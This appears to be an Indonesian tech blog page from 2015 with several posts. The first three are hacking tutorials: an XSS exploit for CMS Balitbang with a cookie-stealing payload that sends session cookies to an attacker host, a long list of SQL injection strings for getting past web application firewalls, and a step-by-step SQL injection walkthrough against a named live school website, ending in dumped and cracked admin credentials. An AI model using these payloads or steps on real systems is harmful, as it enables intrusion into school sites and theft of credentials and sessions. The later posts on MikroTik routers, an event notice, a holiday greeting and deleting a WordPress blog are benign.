Rabu, 29 Juli 2015

Bug XSS Di CMS Balitbang All Version


halo sobat injector.. kali ini akan kami bagi satu lagi bug di web berbasis cms balitbang... cekidot...:D

# Exploit Title:: bug XSS on CMS balitbang all version
# Date :: 2015-07-13
# Homepage:https ::divisidatalitbang.net
# Exploit Author:: Minato
# Dork :: site:sch.id atau bisa dikembangin lagi
==================
VULNERABLE CODE
==================
functions\fungsi_artikel.php:$kd=$_POST['kode'];
functions\agenda.php:$kode = $_GET['kode'];
functions\functions_download.php: $kode=$_GET['kode'];
functions\functions_mem.php:$kode=$_GET['kode'];
functions\fungsi_berita.php:$kd=$_GET['kode'];
dan bnyk lagy yg lainnya
# POC
http://www.sman11-smg.sch.id/html/index.php?id=artikel&kode=33'><script>alert(document.cookie)</script>
http://www.sman11-smg.sch.id/html/index.php?id=berita&kode=73'><script>alert(document.cookie)</script>
# XSS concept attacking ::GET PHPSESSID untuk menjadi admin
<script>window.location="http://www.site-attacker.com/xss-stealer.php?cookie=document.cookie";</script>
http://www.sman11-smg.sch.id/html/index.php?id=berita&kode=73'><script>window.location="http://www.site-attacker.com/xss-stealer.php?cookie=document.cookie";</script>

nantikan trik trik sqli kami selanjutnya...:D
Read more

Selasa, 28 Juli 2015

MACAM MACAM BYPASS WAF

dalam dunia injector kita tidak asing lagi dengan istilah WAF.
apasih waf itu... waf adalah kepanjangan (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...

jadi.....rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** )

untuk itu saya akan sedikit berbagi tentang jenis2 waf yg biasa di gunakan dalam dunia injector..:D

[~] order by [~]

/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/

[~] UNION select [~]

/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

[~] information_schema.tables [~]

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table

[~] concat() [~]

CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))

[~] group_concat() [~]

/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)

gmana...lumayan banyak kan... ga usah di hafal...ntar bikin botak...
karena sebagai sulusinya udah sya sertakan hackbar yg sudah include byapass wafnya.
bisa di donlod di sini hackbar modif

happy injecting...:D
WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...

rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) - See more at: http://indonesiahackercyberteam.blogspot.com/2013/12/bypass-sql-dengan-waf.html#sthash.YesIXDfl.dpuf
WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...

rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) - See more at: http://indonesiahackercyberteam.blogspot.com/2013/12/bypass-sql-dengan-waf.html#sthash.YesIXDfl.dpu
WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...

rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) - See more at: http://indonesiahackercyberteam.blogspot.com/2013/12/bypass-sql-dengan-waf.html#sthash.YesIXDfl.dpuf

WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...


rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) - See more at: http://indonesiahackercyberteam.blogspot.com/2013/12/bypass-sql-dengan-waf.html#sthash.YesIXDfl.dpuf

WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...


rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) - See more at: http://indonesiahackercyberteam.blogspot.com/2013/12/bypass-sql-dengan-waf.html#sthash.YesIXDfl.dpuf
Read more

SQL INJECTION ON CMS BALITBANG

sql injection on cms balitbang
selamat datang dan selamat berkunjung para injector...:D
kali ini sya akan ngasih tutorial injeksi website pada cms balitbang.
seperti yang kita tahu cms balitbang memiliki banyak celah..mulai dari default password hingga registration member dengan inspect element.
tapi kali ini saya tidak akan membahas bug-bug di atas. saya akan fokus gmana masuk ke web berbasis cms balitbang dengan tekhnik sql injection.
ok..lets start..

alat2 yang di butuhkan

-kompi (wajib hukumnya.. :D)
-koneksi internet
-browser disarankan memakai mozilla firefox (karena kita akan menggunakan addons hackbar)
-hackbar. di sini sy memakai hackbar modifan. karena di dalmnya sudah include dios dan query untuk membypass waf. bisa di donlod di sini
 download di sini

otomatis terdownload,kemudian klik allow..kemudian kilk installnow otomatis addons hackbar terinstall di browser anda. "penting di ingat bahwa hackbar di atas sangat berguna untuk kita melakukan injeksi"
-untuk dorknya silahkan berkreasi sendiri..

anggap aja kita udah punya targetnya,. di sini saya gunakan live target http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17&profil=Sarana+&+Prasarana

kita buka browser mozilla kita ..
kita lakukan test pada url dengan menambahkan tanda kutip ( ' )
http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17'&profil=Sarana+&+Prasarana

dan ternyata sebagian file hilang. berrarti bisa di pastikan web vuln sqli.
selanjutnya kita masukkan injeksi kita dengan cara http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17+order+by+1--+&profil=Sarana+&+Prasarana
lakuan secara berutuan hingga ketemu erornya.. ok..ternyata eror ada di kolom  8


selanjutnya kita masukan perintah union select untuk mencari angka injeksinya http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17+and+0+union+select+1,2,3,4,5,6,7,8--+-&profil=Sarana+&+Prasarana
ternyata muncul muncul angka ajaib yaitu 2 dan 3.




selanjutnya di sinilah fungsi hackbar kita tadi yaitu untuk melakukan dios(dump in one shoot)
buka hackbar dengan cara klik tools/show/hide hackbar atau tekan f9

kita blok angka ajaibnya di hackbar yaitu angka 3 kemudia klik UNIOON BASED -DIOS mysql -dios by madblood kemudian klik execute..(lihat gambar)



dannnn...wala...... muncul semua daleman webnya..;D


selanjutnya kita dump isi username dan passwordanya... bingo..... balitbang owned..:D

langkah selajutnya silahkan crack passwordnya dan silahkan login...tapi ingat jangan tebas index.

sekian tutorial cupu dr saya...maaf kalo ada salah2 dalam penulisan maklum masih belajar bikin tutorial kak..

NB: hackbar di atas bisa di gunakan juga untuk dios web lain.. mulai dari eror based hingga dios mssql.. untuk tutorial selanjutnya harap bersabar..makasih udah berkunjung..


Read more

Senin, 27 Juli 2015

Cara Reset Routerboard MikroTik [Hardware]

Penulis Artikel : Ahmad Lukman Hakim
Berikut saya akan menulis artikel tentang cara mereset Routerboard MikroTik. Saya disini menggunakan series RB 700, seperti RB 711, 750, 751, dsb. Ini adalah cara mereset routerboard MikroTik secara HARDWARE. Saya yakin kalau cara mereset routerboard MikroTik secara SOFTWARE itu lebih mudah daripada secara HARDWARE dan caranya tidak sebarang menekan tombol reset saja, tetapi ada prosedur yang harus diperhatikan baik-baik. 

Berikut prosedur cara reset Routerboard MikroTik secara hardware:
1. Pastikan semua kabel UTP tidak ada yang terhubung ke port Ethernet.
2. Pastikan kabel Adaptor atau kabel Power tidak tercolok ke routerboard (harus router dalam keadaan off)
3. Ambil pena (atau alat lain yang kecil-lancip dan tidak mudah patah) yang bisa masuk ke lubang tombol reset routerboard.

4. Tekan tombol reset-nya sampai berbunyi 'tek' dan tahan (jangan dilepas) tetap kondisikan seperti tersebut lalu ambil kabel adaptor (power) dan colokan. Ini dilakukan dengan tetap menekan tombol resetnya
"Jika tombol reset terlepas pada saat proses mencolokan kabel adaptor (power) maka anda harus mengulangi prosedur no.4"
5. Tetap dalam kondisi tersesebut, tunggu sampai anda melihat lampu (LED) ACT menyala, tetap dalam kondisi tersebut sampai lampu ACT mati.
6. Masih dalam kondisi menekan tombol reset, tunggu lampu indikator port Ethernet menyala sebentar kemudian mati. Biasanya membutuhkan waktu 20-40 detik.
7. Setelah semua lampu indikator pada port Ethernet menyala kemudian padam. Lepaskan kabel adaptor (power), sehingga routerboard dalam keadaan off.
8. Colokan kembali kabel adaptor (power) untuk menghidupkan routerboard.
9. Routerboard sudah dalam keadaan default configuration. Anda bisa memulai konfigurasi dari awal.

Semoga dapat bermanfaat bagi pembaca yang belum tahu prosedur yang benar bagaimana itu me-reset routerboard MikroTik.


Read more

Minggu, 26 Juli 2015

Ikuti Mikrotik User Meeting Yogyakarta - Oktober 2015

Mikrotik User Meeting (MUM) akan kembali diselenggarakan di Indonesia. Setelah 2 tahun berturut-turut diselenggarakan di Yogyakarta, tahun 2015 ini juga akan diselenggarakan di tempat yang sama. Ada yang belum tau apa itu Mikrotik User Meeting (MUM)?


Apa itu Mikrotik User Meeting (MUM)?

Mikrotik User Meeting (MUM) adalah Sebuah konferensi dan pertemuan antar penggiat Mikrotik yang membahas tentang Software Mikrotik RouterOS dan, Hardware Mikrotik RouterBoard. Pada konferensi Mikrotik ini terdapat beberapa expert Mikrotik Indonesia dan Mancanegara yang berbagi informasi melalui presentasi tentang Mikrotik. Anda dapat mengajukan pertanyaan tentang topik tersebut. Ada juga Demo penggunaan teknologi terbaru Mikrotik, pengenalan produk baru, semua ada disini.
Selengkapnya tentang MUM bisa anda baca disini :
Apa itu Mikrotik User Meeting (MUM)?

MUM Indonesia tahun ini diselenggarakan di tempat yang sama, yakni di :
Royal Ambarrukmo, Jl. Adi Sucipto No. 81, Yogyakarta 55281

Acara ini akan dilaksanakan pada :
9 - 10 Oktober 2014


Penasaran dengan agenda Acara MUM tahun lalu?
Download Materi & Video MUM Indonesia - Yogyakarta 5-6 Desember 2014

Anda tertarik mengikuti event ini? Silakan daftar disini GRATIS.
mum.mikrotik.com/2015/ID/info



Setelah proses pendaftaran selesai, anda akan diberi tiket dalam bentuk .pdf seperti ini :



Silakan cetak dan potong tiket nya, lalu bawa pada saat hari pelaksanaan.

Oke, sampai jumpa di MUM Indonesia Yogyakarta 9 - 10 Oktober 2015.
Read more

Kamis, 16 Juli 2015

Selamat Hari Raya Idul Fitri 1436 H

Assalamu'alaikum Wr. Wb.
Alhamdulillah, puji syukur kami panjatkan ke hadirat Allah SWT, karena dengan rahmat Nya lah kita semua bisa kembali bertemu hari yang Fitri di tahun 2015 atau 1436 H ini.

Pada hari yang fitri ini, Saya mohon maaf apabila di dalam blog ini ada sesuatu hal yang tidak berkenan di hati pembaca sekalian. Mungkin ada beberapa dari pembaca sekalian yang berkomentar dan mengajukan pertanyaan baik di blog MikrotikIndo ini maupun di Fans Page Facebook namun tidak ada jawaban. Saya mohon maaf yang sebesar-besarnya karena kesibukan dan aktifitas saya sehari-hari yang padat sehingga tidak sempat membalas komentar dan pertanyaan pembaca sekalian satu per satu. Semoga bisa dijadikan maklum.

Saya ucapkan banyak terimakasih karena pembaca sekalian telah bersedia membaca tulisan saya di blog ini. Semoga apa yang saya tuliskan di blog ini dapat memberikan manfaat bagi pembaca sekalian.



Saya Rizky Agung Pratama selaku admin dari blog dan Facebook Fans Page MikrotikIndo mengucapkan Selamat Hari Raya Idul Fitri 1436 H Mohon maaf lahir dan bathin.

Akhir kata, Wassalamu'alaikum Wr. Wb.

Banjarnegara, 1 Syawal 1436 H

Read more

Rabu, 15 Juli 2015

Membuat Proxy Eksternal Mikrotik Menggunakan RouterOS Mikrotik

Assalamualaikum warahmatullahi wabarokatuh.........

Sebelumnya kami dari mikrotikindo.blogspot.com mengucapkan "Minal aidin Wal faidzin" Mohon Maaf Lahir Batin.

jika kami pernah menyinggun atau membuat kesalahan, baik disengaja maupun tidak disengaja mohon di "Maafkan" :)


Semoga  agan’ dan agan wati sehat selalu yh 
Sebelum kami mudik lebaran besok pagi, insya Allah semoga selamat sampai ditujuan :) 

Malam ini saya akan nge-share sedikit pengetahuan kami tentang  bagaimana membuat web proxy eksternal, Sebelumnya kami perna nge-post  cara Menambah Cache Proxy Mikrotik Menggunakan USB Flashdisk 

Tetapi pada postingan kali ini sangat berbeda dimana yang akan menjadi proxy eksternya adalah Menggunakan mikrotik itu sendiri hihiihihiihi



Baiklah langsung saja saya mengganbarkan topologi logikalnya seperti dibawah ini


1.  Melakukan konfigurasi pada router GW mikrotik
Lakukan pada terminal :

Ip ad ad ad=192.168.137.2/24 int=ether1

Ip ad ad ad=10.10.10.1/30 int=ether2

Ip ad ad ad=192.168.0.254/24 int=ether3

Ip dns set all=yes ser=118.98.44.100,118.98.44.10

Ip firewall nat nat add chain=dstnat src-address=192.168.0.0/24 protokol=tcp \
dst-port=80  action=dst-nat to-address=10.10.10.2 to-port=8080

Ip firewall nat add ch=srcnat out-interface=ether1 action=masquerade

Ip route ad gateway=192.168.137.1




2.    Melakukan konfigurasi pada router Web-proxy
Lakukan di terminal

Ip ad ad ad=10.10.10.2/30 int=ether1

Ip dns set all=yes ser=118.98.44.100,118.98.44.10

Ip proxy set enable=yes port=8080 cache-administrator=anshar201@gmail.com cache-on-disk=yes max-cache-size=unlimited

Ip route ad gateway=10.10.10.1






Result :

  • Mengakses mikrotikindo.blogspot.com
  • Keadaan pada router GW

  • Keadaan pada Router Proxy





the end, thanks for reading.
Read more

Jumat, 10 Juli 2015

Cara Jitu Menghapus Blog di Wordpress.com

Penulis Artikel : Ahmad Lukman Hakim
Sebelumnya, kenapa saya ingin menghapus blog saya di Wordpress? Jawab: karena saya ingin memulai menulis lagi dari Awal di platform Blogger. Issue dari guru saya, untuk bisa berbisnis Google Adsense yang mudah kita harus menggunakan platform Google juga, jadi saya hapus blog saya yang di platform Wordpress. Itulah alasan saya.

Tidak usah panjang lebar saya berkata, lebih baik sesuai tujuanya yaitu menulis artikel tentang "Cara menghapus Blog Wordpress". Berikut langkah-langkahnya yang disertai gambar supaya pembaca lebih cepat actions :
1. Sebelumnya, anda harus Login ke Dashbor Wordpress anda.
2. Selanjutnya silahkan pilih menu Tools/Perkakas/Plugin, ketika kita klik maka akan muncul sub-menu dibawahnya, Pilih Remove Site/Hapus Blog.
3. Berikut adalah pertanyaan yang diberikan oleh pihak wordpress. Karena saya ingin menulis/blogging di platform Blogger maka saya pilih "Saya menggunakan platform lain."
Seseorang pasti ada alasanya, kenapa ingin menghapus blognya. Jadi pilih sesuai alasan anda.
4. Kemudian pilih Blogger.
Berbeda jika pada langkah di nomor 3 anda memilih alasan yang lain.
5. Nah, silahkah !!! backup dulu semua isi blog anda. Pilih Ekspor/Export.
6. Kemudian pilih apa yang mau anda ekspor. Karena saya akan mengekspor semua isi maka saya pilih Semua Isi lalu Unduh Berkas Ekspor untuk download file eksporanya.
7. Klik Hapus Sekarang untuk menghapus Blog wordpress anda.
8. Berikan tanda Cheklist - Lihat pada Gambar. Lalu Hapus Sekarang.
9. Anda disuruh untuk Confirmasi Penghapusan. Cek email anda untuk mengkonfirmasi.
10.Nah, Klik link konfirmasinya.
Blog Wordpress Anda telah dihapus.

Semoga bermanfaat,,, #luxsmart





Read more